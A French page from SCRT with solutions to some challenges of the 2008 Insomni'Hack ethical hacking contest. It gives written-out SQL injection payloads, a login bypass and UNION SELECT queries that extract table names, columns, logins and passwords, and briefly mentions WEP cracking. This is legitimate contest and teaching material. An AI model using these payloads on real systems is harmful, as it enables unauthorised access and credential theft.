Le 8
février 2008, SCRT a organisé le premier concours
de Ethical Hacking de Suisse romande.
Le concours est maintenant terminé.
Plus de 60 participants se seront affrontés sur
différentes épreuves touchant à divers domaines de
la sécurité des systèmes d'information.
Les épreuves
Nous allons présenter ici les solutions de quelques unes des
épreuves auxquelles les candidats ont été
confrontés.
No
Nom du
challenge
Points
Accès (lors du
concours)
-
-
-
1
Methadone
200
hackthis.insomni.hack/methadone
6
Highlander
600
begin.insomni.hack
8
Oxymore
200
hackthis.insomni.hack/oxymore
9
NoNo
100
hackthis.insomni.hack/NoNo
5
Ventriloque
600
www.insomni.hack/ventriloque
3
Cherche&Trouve
1000
www.insomni.hack/cherche&trouve
2
Héroïne
800
hackthis.insomni.hack/heroine
7
Cascade Scoubidou
200
www.insomni.hack/cascade
7
Cascade orthodoxe
400
www.insomni.hack/cascade
7
Cascade de chiffres
600
www.insomni.hack/cascade
7
Cascade old-school
800
www.insomni.hack/cascade
10
OUAIP
500
Epreuve 1 :
méthadone
Il s'agissait d'une simple injection SQL
un simple
' OR 'x'='x permettait de contourner la protection par login
mot de passe.
Epreuve 2 :
Heroïne
De nouveau une injection SQL, mais ... un peu plus
compliquée.
Pour passer cette épreuves, les étapes étaient les
suivantes :
Récupérer le nom de la table :
' OR 'x' = 'x' UNION SELECT table_name FROM
information_schema.tables WHERE '\%'='\
Récupérer les colonnes :
' OR 'x' = 'x' UNION SELECT column_name FROM
information_schema.columns WHERE '\%'='\
Récupérer le login :
' OR 'x' = 'x' UNION SELECT identifiant FROM membres WHERE
'\%'='\ Récupérer le password :
' OR 'x' = 'x' UNION SELECT motpasse FROM membres WHERE
'\%'='\
Epreuve 3 : Cherche &
trouve
2 approches possibles : reverse engineering (recherche des 2 algos
utilisés) ou scripting/brute force (combinaison de
différents algos et comparaison des résultats de
sortie)
Epreuve 10 : Ouaip
Comme son nom l'indique, pour cette épreuve les candidats
devaient cracker le réseau WEP (64 bits) qui était
disponible lors de l'épreuve.
Insomni'Hack 08
